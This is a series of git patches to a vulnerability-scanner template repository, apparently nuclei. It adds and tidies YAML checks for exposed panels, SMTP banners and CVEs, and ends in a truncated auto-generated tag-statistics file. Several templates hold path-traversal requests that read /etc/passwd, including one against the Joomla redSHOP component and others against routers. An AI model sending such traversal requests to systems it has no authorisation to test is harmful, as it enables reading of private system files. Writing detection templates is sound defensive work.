Date: Sun, 12 Sep 2021 23:24:03 +0530 Subject: [PATCH 242/339] Rename technologies/telerik-fileupload-detect.yaml to technologies/telerik/telerik-fileupload-detect.yaml --- technologies/{ => telerik}/telerik-fileupload-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => telerik}/telerik-fileupload-detect.yaml (100%) diff --git a/technologies/telerik-fileupload-detect.yaml b/technologies/telerik/telerik-fileupload-detect.yaml similarity index 100% rename from technologies/telerik-fileupload-detect.yaml rename to technologies/telerik/telerik-fileupload-detect.yaml From 6814a334ea3e5c61268a68946fffb7e8edeae3e9 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sun, 12 Sep 2021 16:31:54 -0300 Subject: [PATCH 243/339] Create totemomail-detect.yaml --- exposed-panels/totemomail-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/totemomail-detect.yaml diff --git a/exposed-panels/totemomail-detect.yaml b/exposed-panels/totemomail-detect.yaml new file mode 100644 index 0000000000..0a133f9cb2 --- /dev/null +++ b/exposed-panels/totemomail-detect.yaml @@ -0,0 +1,21 @@ +id: totemomail-detect + +info: + name: Detect totemomail - Secure email communication + author: johnk3r + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/responsiveUI/webmail/folder.xhtml" + + matchers-condition: and + matchers: + - type: word + words: + - "totemomail" + part: body + - type: status + status: + - 200 From 05d086181c0225598e631482d27d5786dfce3971 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 13 Sep 2021 07:35:04 +0700 Subject: [PATCH 244/339] Create CVE-2010-1531.yaml --- cves/2010/CVE-2010-1531.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1531.yaml diff --git a/cves/2010/CVE-2010-1531.yaml b/cves/2010/CVE-2010-1531.yaml new file mode 100644 index 0000000000..c118f123cd --- /dev/null +++ b/cves/2010/CVE-2010-1531.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1531 + +info: + name: Joomla! Component redSHOP 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12054 + - https://www.cvedetails.com/cve/CVE-2010-1531 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From d48ac960a7c1c4bd8865e4604ba0f300f8fd937c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:08:30 +0530 Subject: [PATCH 245/339] Rename exposed-panels/ibm-note-login.yaml to exposed-panels/ibm/ibm-note-login.yaml --- exposed-panels/{ => ibm}/ibm-note-login.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{ => ibm}/ibm-note-login.yaml (100%) diff --git a/exposed-panels/ibm-note-login.yaml b/exposed-panels/ibm/ibm-note-login.yaml similarity index 100% rename from exposed-panels/ibm-note-login.yaml rename to exposed-panels/ibm/ibm-note-login.yaml From 8b117065d5e6bbc2d33b08a0968dc94a31a5fa27 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:08:48 +0530 Subject: [PATCH 246/339] Update ibm-note-login.yaml --- exposed-panels/ibm/ibm-note-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/ibm/ibm-note-login.yaml b/exposed-panels/ibm/ibm-note-login.yaml index a178a6d3b7..8aeaae29fa 100644 --- a/exposed-panels/ibm/ibm-note-login.yaml +++ b/exposed-panels/ibm/ibm-note-login.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7122 - tags: panel + tags: panel,ibm requests: - method: GET From 96b22ca82ae7ba87f5cf5c33b27dd5cd934a308a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:09:16 +0530 Subject: [PATCH 247/339] Update and rename exposed-panels/ibm-security-access-manager.yaml to exposed-panels/ibm/ibm-security-access-manager.yaml --- .../{ => ibm}/ibm-security-access-manager.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) rename exposed-panels/{ => ibm}/ibm-security-access-manager.yaml (83%) diff --git a/exposed-panels/ibm-security-access-manager.yaml b/exposed-panels/ibm/ibm-security-access-manager.yaml similarity index 83% rename from exposed-panels/ibm-security-access-manager.yaml rename to exposed-panels/ibm/ibm-security-access-manager.yaml index 3d2e8aa816..77c728b173 100644 --- a/exposed-panels/ibm-security-access-manager.yaml +++ b/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -2,10 +2,11 @@ id: ibm-security-access-manager info: name: Detects IBM Security Access Manager - description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. - reference: https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager author: geeknik severity: info + description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. + reference: https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager + tags: panel,ibm requests: - method: GET @@ -16,11 +17,8 @@ requests: matchers: - type: word words: - - "IBM Security Access Manager" - - "<h2>IBM Security" - - "<em>Access Manager" + - "<title>IBM Security Access Manager" part: body - condition: and - type: word part: header From dcc3ef533035cba20023c7d0ac45195c33c6b9f3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:10:25 +0530 Subject: [PATCH 248/339] Update ibm-security-access-manager.yaml --- exposed-panels/ibm/ibm-security-access-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/ibm/ibm-security-access-manager.yaml b/exposed-panels/ibm/ibm-security-access-manager.yaml index 77c728b173..4d40dab456 100644 --- a/exposed-panels/ibm/ibm-security-access-manager.yaml +++ b/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -21,6 +21,6 @@ requests: part: body - type: word - part: header words: - "IBM Security Access Manager for Web" + part: header From 7a3dbb27e29781d85a8698855aac2f7ff9e37ae7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:26:26 +0530 Subject: [PATCH 249/339] Create totemomail-smtp-detect.yaml --- network/totemomail-smtp-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 network/totemomail-smtp-detect.yaml diff --git a/network/totemomail-smtp-detect.yaml b/network/totemomail-smtp-detect.yaml new file mode 100644 index 0000000000..7eecf58266 --- /dev/null +++ b/network/totemomail-smtp-detect.yaml @@ -0,0 +1,21 @@ +id: totemomail-smtp-detect + +info: + name: Totemomail SMTP Server Detect + author: princechaddha + severity: info + tags: mail,smtp,network,totemomail + +network: + - inputs: + - data: "\r\n" + read-size: 2048 + + host: + - "{{Hostname}}" + - "{{Hostname}}:25" + + matchers: + - type: word + words: + - "totemomail" From 546bd6a03870668de2c561545565e1e06a356417 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 13 Sep 2021 15:28:35 +0530 Subject: [PATCH 250/339] matcher update --- vulnerabilities/other/bullwark-momentum-lfi.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index 96e46cec40..e6f95ebac9 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -29,6 +29,6 @@ requests: status: - 200 - - type: word - words: - - "root:" + - type: regex + regex: + - "root:.*:0:0" \ No newline at end of file From 19f73e7c2bac4ba014b7affd2e5b1c5d8fd79f71 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:31:03 +0530 Subject: [PATCH 251/339] Update totemomail-detect.yaml --- exposed-panels/totemomail-detect.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposed-panels/totemomail-detect.yaml b/exposed-panels/totemomail-detect.yaml index 0a133f9cb2..dd29136211 100644 --- a/exposed-panels/totemomail-detect.yaml +++ b/exposed-panels/totemomail-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect totemomail - Secure email communication author: johnk3r severity: info + tags: totemomail,panel requests: - method: GET @@ -14,8 +15,9 @@ requests: matchers: - type: word words: - - "totemomail" + - "WebMail login: totemomail® WebMail" part: body + - type: status status: - 200 From e18cc1421825172f8fded246be2c39bbdf65549f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:34:18 +0530 Subject: [PATCH 252/339] Update bullwark-momentum-lfi.yaml --- vulnerabilities/other/bullwark-momentum-lfi.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index e6f95ebac9..be615bacc1 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -4,12 +4,11 @@ info: name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal author: pikpikcu severity: high - tags: bullwark,lfi reference: - https://www.exploit-db.com/exploits/47773 - http://www.bullwark.net/ # vendor homepage - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link - + tags: bullwark,lfi additional-fields: version: Bullwark Momentum Series Web Server JAWS/1.0 shodan-dork: https://www.shodan.io/search?query=Bullwark&page=1 @@ -31,4 +30,4 @@ requests: - type: regex regex: - - "root:.*:0:0" \ No newline at end of file + - "root:.*:0:0" From 18879698fa2755739945369b88750d7db9c87831 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:55:14 +0530 Subject: [PATCH 253/339] Update bullwark-momentum-lfi.yaml --- vulnerabilities/other/bullwark-momentum-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index be615bacc1..a6424a4b88 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -8,11 +8,11 @@ info: - https://www.exploit-db.com/exploits/47773 - http://www.bullwark.net/ # vendor homepage - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link - tags: bullwark,lfi additional-fields: version: Bullwark Momentum Series Web Server JAWS/1.0 shodan-dork: https://www.shodan.io/search?query=Bullwark&page=1 fofa-dork: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D + tags: bullwark,lfi requests: - raw: From 12b42bd029ff05ebad24ab64e01cb0438473ebec Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 13 Sep 2021 23:33:03 +0530 Subject: [PATCH 254/339] misc update --- .../{weblogic-default-login.yaml => weblogic-weak-login.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename default-logins/weblogic/{weblogic-default-login.yaml => weblogic-weak-login.yaml} (91%) diff --git a/default-logins/weblogic/weblogic-default-login.yaml b/default-logins/weblogic/weblogic-weak-login.yaml similarity index 91% rename from default-logins/weblogic/weblogic-default-login.yaml rename to default-logins/weblogic/weblogic-weak-login.yaml index 310ae8dbb3..e49f60202c 100644 --- a/default-logins/weblogic/weblogic-default-login.yaml +++ b/default-logins/weblogic/weblogic-weak-login.yaml @@ -1,7 +1,7 @@ -id: weblogic-default-login +id: weblogic-weak-login info: - name: WebLogic default login + name: WebLogic weak login author: pdteam severity: high tags: default-login,weblogic From 7e69bb8d9fdc14198fa40df4c06dc7cca485fd1a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 14 Sep 2021 00:11:45 +0530 Subject: [PATCH 255/339] Update ibm-security-access-manager.yaml --- exposed-panels/ibm/ibm-security-access-manager.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/exposed-panels/ibm/ibm-security-access-manager.yaml b/exposed-panels/ibm/ibm-security-access-manager.yaml index 4d40dab456..ee25284a26 100644 --- a/exposed-panels/ibm/ibm-security-access-manager.yaml +++ b/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -24,3 +24,10 @@ requests: words: - "IBM Security Access Manager for Web" part: header + + - type: word + words: + - "/mga/sps/authsvc/policy/forgot_username" + - "/mga/sps/authsvc/policy/forgot_password" + part: body + condition: and From acbb038e016d0b9feef502299c074950d27e4c0c Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 01:22:44 +0530 Subject: [PATCH 256/339] misc update --- cves/2021/CVE-2021-20091.yaml | 2 +- cves/2021/CVE-2021-20092.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml index 650be7cd88..95bdbe5501 100644 --- a/cves/2021/CVE-2021-20091.yaml +++ b/cves/2021/CVE-2021-20091.yaml @@ -21,7 +21,7 @@ requests: - | GET /images/..%2finfo.html HTTP/1.1 Host: {{Hostname}} - Referer: {{{{BaseURL}}}}/info.html + Referer: {{BaseURL}}/info.html - | POST /images/..%2fapply_abstract.cgi HTTP/1.1 diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml index 72246e7705..a84b883624 100644 --- a/cves/2021/CVE-2021-20092.yaml +++ b/cves/2021/CVE-2021-20092.yaml @@ -22,7 +22,7 @@ requests: - | GET /images/..%2finfo.html HTTP/1.1 Host: {{Hostname}} - Referer: {{{{BaseURL}}}}/info.html + Referer: {{BaseURL}}/info.html - | GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1 From 8c92195fef525c588d8ebcc8e1c79fa862d92047 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 01:54:21 +0530 Subject: [PATCH 257/339] misc update --- ...l-native-cred-bruteforce.yaml => mysql-native-password.yaml} | 2 +- ...ative-password-bruteforce.yaml => tidb-native-password.yaml} | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) rename network/{mysql-native-cred-bruteforce.yaml => mysql-native-password.yaml} (91%) rename network/{tidb-native-password-bruteforce.yaml => tidb-native-password.yaml} (93%) diff --git a/network/mysql-native-cred-bruteforce.yaml b/network/mysql-native-password.yaml similarity index 91% rename from network/mysql-native-cred-bruteforce.yaml rename to network/mysql-native-password.yaml index 213c71805a..3303abcd3b 100644 --- a/network/mysql-native-cred-bruteforce.yaml +++ b/network/mysql-native-password.yaml @@ -1,4 +1,4 @@ -id: mysql-native-password-bruteforce +id: mysql-native-password info: name: MySQL DB with enabled native password diff --git a/network/tidb-native-password-bruteforce.yaml b/network/tidb-native-password.yaml similarity index 93% rename from network/tidb-native-password-bruteforce.yaml rename to network/tidb-native-password.yaml index a72290581b..91aa175cb7 100644 --- a/network/tidb-native-password-bruteforce.yaml +++ b/network/tidb-native-password.yaml @@ -1,4 +1,4 @@ -id: tidb-native-password-bruteforce +id: tidb-native-password info: name: TiDB DB with enabled native password From 41d001ebb6051c79bc846dc7369e3132d1593370 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 Sep 2021 20:33:42 +0000 Subject: [PATCH 258/339] Auto Generated Templates Stats [Mon Sep 13 20:33:42 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1549 ++++++++++++++++++++++-------------------- TOP-10.md | 20 +- 3 files changed, 810 insertions(+), 761 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 01a0ac282d..e295b164f1 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":666},{"name":"panel","count":236},{"name":"lfi","count":228},{"name":"xss","count":225},{"name":"exposure","count":221},{"name":"wordpress","count":206},{"name":"rce","count":193},{"name":"cve2020","count":159},{"name":"wp-plugin","count":139},{"name":"cve2021","count":112},{"name":"tech","count":111},{"name":"config","count":93},{"name":"cve2019","count":90},{"name":"cve2018","count":80},{"name":"takeover","count":74},{"name":"apache","count":66},{"name":"","count":66},{"name":"token","count":64},{"name":"default-login","count":60},{"name":"joomla","count":59},{"name":"iot","count":58},{"name":"cve2010","count":51},{"name":"cve2017","count":49},{"name":"oob","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"network","count":39},{"name":"sqli","count":38},{"name":"ssrf","count":35},{"name":"cve2016","count":32},{"name":"oracle","count":31},{"name":"logs","count":30},{"name":"workflow","count":30},{"name":"jira","count":28},{"name":"redirect","count":28},{"name":"atlassian","count":27},{"name":"listing","count":25},{"name":"misc","count":23},{"name":"cve2015","count":20},{"name":"disclosure","count":20},{"name":"router","count":19},{"name":"aem","count":19},{"name":"generic","count":19},{"name":"cisco","count":19},{"name":"sap","count":18},{"name":"auth-bypass","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":15},{"name":"cve2012","count":14},{"name":"misconfig","count":14},{"name":"struts","count":13},{"name":"android","count":13},{"name":"cve2011","count":13},{"name":"adobe","count":13},{"name":"fuzz","count":13},{"name":"php","count":13},{"name":"devops","count":12},{"name":"weblogic","count":12},{"name":"jenkins","count":12},{"name":"dns","count":12},{"name":"dlink","count":12},{"name":"zoho","count":11},{"name":"cve2013","count":11},{"name":"ftp","count":9},{"name":"aws","count":9},{"name":"xxe","count":9},{"name":"magento","count":9},{"name":"cnvd","count":8},{"name":"login","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"cms","count":7},{"name":"coldfusion","count":7},{"name":"backup","count":7},{"name":"cve2009","count":7},{"name":"kubernetes","count":7},{"name":"nginx","count":7},{"name":"netgear","count":7},{"name":"files","count":7},{"name":"vmware","count":7},{"name":"google","count":6},{"name":"cve2008","count":6},{"name":"jetty","count":6},{"name":"citrix","count":6},{"name":"dell","count":6},{"name":"confluence","count":6},{"name":"laravel","count":6},{"name":"solr","count":6},{"name":"docker","count":6},{"name":"rconfig","count":6},{"name":"django","count":6},{"name":"api","count":6},{"name":"java","count":5},{"name":"ibm","count":5},{"name":"drupal","count":5},{"name":"lucee","count":5},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"fileupload","count":5},{"name":"wp-theme","count":5},{"name":"nodejs","count":5},{"name":"microsoft","count":5},{"name":"phpmyadmin","count":5},{"name":"printer","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"tomcat","count":4},{"name":"thinkphp","count":4},{"name":"exchange","count":4},{"name":"asp","count":4},{"name":"hp","count":4},{"name":"glpi","count":4},{"name":"thinkcmf","count":4},{"name":"magmi","count":4},{"name":"jolokia","count":4},{"name":"firmware","count":4},{"name":"elastic","count":4},{"name":"webserver","count":4},{"name":"vpn","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"wso2","count":4},{"name":"buffalo","count":4},{"name":"moodle","count":4},{"name":"grafana","count":4},{"name":"samsung","count":4},{"name":"traversal","count":4},{"name":"deserialization","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"targa","count":3},{"name":"bitrix","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"terramaster","count":3},{"name":"slack","count":3},{"name":"amazon","count":3},{"name":"tikiwiki","count":3},{"name":"backups","count":3},{"name":"openssh","count":3},{"name":"nacos","count":3},{"name":"zabbix","count":3},{"name":"springcloud","count":3},{"name":"httpd","count":3},{"name":"kevinlab","count":3},{"name":"vbulletin","count":3},{"name":"ssh","count":3},{"name":"caucho","count":3},{"name":"nexus","count":3},{"name":"zhiyuan","count":3},{"name":"r-seenet","count":3},{"name":"mongodb","count":3},{"name":"git","count":3},{"name":"itop","count":3},{"name":"intrusive","count":3},{"name":"opensis","count":3},{"name":"resin","count":3},{"name":"kafka","count":3},{"name":"nosqli","count":3},{"name":"lfr","count":3},{"name":"ebs","count":3},{"name":"fanruan","count":3},{"name":"microstrategy","count":3},{"name":"log","count":3},{"name":"ofbiz","count":3},{"name":"bypass","count":3},{"name":"cve2007","count":2},{"name":"sharepoint","count":2},{"name":"showdoc","count":2},{"name":"hjtcloud","count":2},{"name":"horde","count":2},{"name":"yapi","count":2},{"name":"prestashop","count":2},{"name":"github","count":2},{"name":"natshell","count":2},{"name":"linkerd","count":2},{"name":"chamilo","count":2},{"name":"dos","count":2},{"name":"npm","count":2},{"name":"emerge","count":2},{"name":"rstudio","count":2},{"name":"phpcollab","count":2},{"name":"strapi","count":2},{"name":"akamai","count":2},{"name":"spark","count":2},{"name":"shellshock","count":2},{"name":"smtp","count":2},{"name":"ucmdb","count":2},{"name":"splunk","count":2},{"name":"grav","count":2},{"name":"oauth","count":2},{"name":"rockethchat","count":2},{"name":"injection","count":2},{"name":"leak","count":2},{"name":"jellyfin","count":2},{"name":"saltstack","count":2},{"name":"sonicwall","count":2},{"name":"fortios","count":2},{"name":"igs","count":2},{"name":"prometheus","count":2},{"name":"trixbox","count":2},{"name":"glassfish","count":2},{"name":"node","count":2},{"name":"keycloak","count":2},{"name":"huawei","count":2},{"name":"hashicorp","count":2},{"name":"ec2","count":2},{"name":"jeedom","count":2},{"name":"paloalto","count":2},{"name":"openfire","count":2},{"name":"icewarp","count":2},{"name":"azure","count":2},{"name":"telerik","count":2},{"name":"mida","count":2},{"name":"middleware","count":2},{"name":"proxy","count":2},{"name":"hasura","count":2},{"name":"service","count":2},{"name":"plesk","count":2},{"name":"voipmonitor","count":2},{"name":"odoo","count":2},{"name":"couchdb","count":2},{"name":"waf","count":2},{"name":"flir","count":2},{"name":"mail","count":2},{"name":"jsf","count":2},{"name":"status","count":2},{"name":"chiyu","count":2},{"name":"xxljob","count":2},{"name":"wordfence","count":2},{"name":"sonarqube","count":2},{"name":"kentico","count":2},{"name":"netis","count":2},{"name":"hoteldruid","count":2},{"name":"maian","count":2},{"name":"seeyon","count":2},{"name":"cve2005","count":2},{"name":"activemq","count":2},{"name":"bigip","count":2},{"name":"axis2","count":2},{"name":"geowebserver","count":2},{"name":"frp","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"backdoor","count":2},{"name":"jboss","count":2},{"name":"nagios","count":2},{"name":"vrealize","count":2},{"name":"nextjs","count":2},{"name":"ecology","count":2},{"name":"webcam","count":2},{"name":"dolibarr","count":2},{"name":"smb","count":2},{"name":"kibana","count":2},{"name":"openam","count":2},{"name":"axis","count":2},{"name":"firebase","count":2},{"name":"idrac","count":2},{"name":"mcafee","count":2},{"name":"rockmongo","count":2},{"name":"globalprotect","count":2},{"name":"hpe","count":2},{"name":"cache","count":2},{"name":"guacamole","count":2},{"name":"akkadian","count":2},{"name":"pcoip","count":1},{"name":"webmodule-ee","count":1},{"name":"expn","count":1},{"name":"pagespeed","count":1},{"name":"alibaba","count":1},{"name":"centos","count":1},{"name":"bigbluebutton","count":1},{"name":"kubeflow","count":1},{"name":"landray","count":1},{"name":"clave","count":1},{"name":"kafdrop","count":1},{"name":"saltapi","count":1},{"name":"zarafa","count":1},{"name":"cve2006","count":1},{"name":"jfrog","count":1},{"name":"trilithic","count":1},{"name":"achecker","count":1},{"name":"tieline","count":1},{"name":"geddy","count":1},{"name":"graphite","count":1},{"name":"mantis","count":1},{"name":"springframework","count":1},{"name":"smartblog","count":1},{"name":"jnoj","count":1},{"name":"yachtcontrol","count":1},{"name":"clickhouse","count":1},{"name":"xunchi","count":1},{"name":"smartsense","count":1},{"name":"blue-ocean","count":1},{"name":"stem","count":1},{"name":"mirai","count":1},{"name":"sgp","count":1},{"name":"pgadmin","count":1},{"name":"hiawatha","count":1},{"name":"default","count":1},{"name":"gespage","count":1},{"name":"bedita","count":1},{"name":"vnc","count":1},{"name":"harbor","count":1},{"name":"webadmin","count":1},{"name":"haproxy","count":1},{"name":"opensmtpd","count":1},{"name":"upload","count":1},{"name":"wifisky","count":1},{"name":"nps","count":1},{"name":"tapestry","count":1},{"name":"socomec","count":1},{"name":"adb","count":1},{"name":"rsyncd","count":1},{"name":"blackboard","count":1},{"name":"servicedesk","count":1},{"name":"logontracer","count":1},{"name":"chevereto","count":1},{"name":"moin","count":1},{"name":"mobileiron","count":1},{"name":"b2evolution","count":1},{"name":"jsp","count":1},{"name":"fedora","count":1},{"name":"pacsone","count":1},{"name":"nordex","count":1},{"name":"empirecms","count":1},{"name":"mpsec","count":1},{"name":"qsan","count":1},{"name":"uwsgi","count":1},{"name":"prtg","count":1},{"name":"parentlink","count":1},{"name":"jquery","count":1},{"name":"wiki","count":1},{"name":"spidercontrol","count":1},{"name":"fortiweb","count":1},{"name":"csod","count":1},{"name":"db","count":1},{"name":"duomicms","count":1},{"name":"tongda","count":1},{"name":"tracer","count":1},{"name":"phpfusion","count":1},{"name":"gogs","count":1},{"name":"argussurveillance","count":1},{"name":"avalanche","count":1},{"name":"sentry","count":1},{"name":"acexy","count":1},{"name":"fortigates","count":1},{"name":"emby","count":1},{"name":"tjws","count":1},{"name":"beanshell","count":1},{"name":"dvwa","count":1},{"name":"linkedin","count":1},{"name":"ssl","count":1},{"name":"cacti","count":1},{"name":"expose","count":1},{"name":"tensorflow","count":1},{"name":"discourse","count":1},{"name":"processmaker","count":1},{"name":"ioncube","count":1},{"name":"panabit","count":1},{"name":"tamronos","count":1},{"name":"codeigniter","count":1},{"name":"flash","count":1},{"name":"azkaban","count":1},{"name":"bullwark","count":1},{"name":"ilo","count":1},{"name":"extractor","count":1},{"name":"vidyo","count":1},{"name":"simplecrm","count":1},{"name":"netdata","count":1},{"name":"openx","count":1},{"name":"svn","count":1},{"name":"goahead","count":1},{"name":"owasp","count":1},{"name":"razor","count":1},{"name":"panos","count":1},{"name":"commax","count":1},{"name":"qcubed","count":1},{"name":"metinfo","count":1},{"name":"csrf","count":1},{"name":"proftpd","count":1},{"name":"nuxeo","count":1},{"name":"sage","count":1},{"name":"grails","count":1},{"name":"synnefo","count":1},{"name":"fastapi","count":1},{"name":"totaljs","count":1},{"name":"tpshop","count":1},{"name":"wazuh","count":1},{"name":"aura","count":1},{"name":"solarlog","count":1},{"name":"netsweeper","count":1},{"name":"netgenie","count":1},{"name":"xiuno","count":1},{"name":"phpinfo","count":1},{"name":"octoprint","count":1},{"name":"rfi","count":1},{"name":"ruckus","count":1},{"name":"exacqvision","count":1},{"name":"soar","count":1},{"name":"ecom","count":1},{"name":"postgres","count":1},{"name":"trane","count":1},{"name":"xvr","count":1},{"name":"kyan","count":1},{"name":"monitorr","count":1},{"name":"alertmanager","count":1},{"name":"bazarr","count":1},{"name":"dotnet","count":1},{"name":"lutron","count":1},{"name":"ghost","count":1},{"name":"wavlink","count":1},{"name":"webui","count":1},{"name":"scs","count":1},{"name":"embedthis","count":1},{"name":"eyelock","count":1},{"name":"heroku","count":1},{"name":"rmi","count":1},{"name":"starttls","count":1},{"name":"ganglia","count":1},{"name":"livezilla","count":1},{"name":"optiLink","count":1},{"name":"dnssec","count":1},{"name":"chinaunicom","count":1},{"name":"nsasg","count":1},{"name":"aruba","count":1},{"name":"lighttpd","count":1},{"name":"qvisdvr","count":1},{"name":"jmx","count":1},{"name":"qdpm","count":1},{"name":"lotuscms","count":1},{"name":"javamelody","count":1},{"name":"hadoop","count":1},{"name":"resourcespace","count":1},{"name":"discord","count":1},{"name":"myucms","count":1},{"name":"opencast","count":1},{"name":"cves2016","count":1},{"name":"ambari","count":1},{"name":"moinmoin","count":1},{"name":"wooyun","count":1},{"name":"eyou","count":1},{"name":"pippoint","count":1},{"name":"rmc","count":1},{"name":"ueditor","count":1},{"name":"sidekiq","count":1},{"name":"eprints","count":1},{"name":"bitly","count":1},{"name":"circontrol","count":1},{"name":"kong","count":1},{"name":"aspnuke","count":1},{"name":"faraday","count":1},{"name":"getsimple","count":1},{"name":"sceditor","count":1},{"name":"iceflow","count":1},{"name":"huijietong","count":1},{"name":"zmanda","count":1},{"name":"tika","count":1},{"name":"addpac","count":1},{"name":"openerp","count":1},{"name":"cors","count":1},{"name":"lansweeper","count":1},{"name":"swagger","count":1},{"name":"servicenow","count":1},{"name":"wamp","count":1},{"name":"emc","count":1},{"name":"ricoh","count":1},{"name":"openstack","count":1},{"name":"office365","count":1},{"name":"dbeaver","count":1},{"name":"centreon","count":1},{"name":"jenkin","count":1},{"name":"commscope","count":1},{"name":"lanproxy","count":1},{"name":"avtech","count":1},{"name":"sangfor","count":1},{"name":"primetek","count":1},{"name":"k8s","count":1},{"name":"triconsole","count":1},{"name":"hiboss","count":1},{"name":"miscrsoft","count":1},{"name":"subrion","count":1},{"name":"payara","count":1},{"name":"druid","count":1},{"name":"wing-ftp","count":1},{"name":"gridx","count":1},{"name":"plastic","count":1},{"name":"ntopng","count":1},{"name":"appweb","count":1},{"name":"monitorix","count":1},{"name":"svnserve","count":1},{"name":"redwood","count":1},{"name":"websvn","count":1},{"name":"adminer","count":1},{"name":"skywalking","count":1},{"name":"cse","count":1},{"name":"ilo4","count":1},{"name":"camunda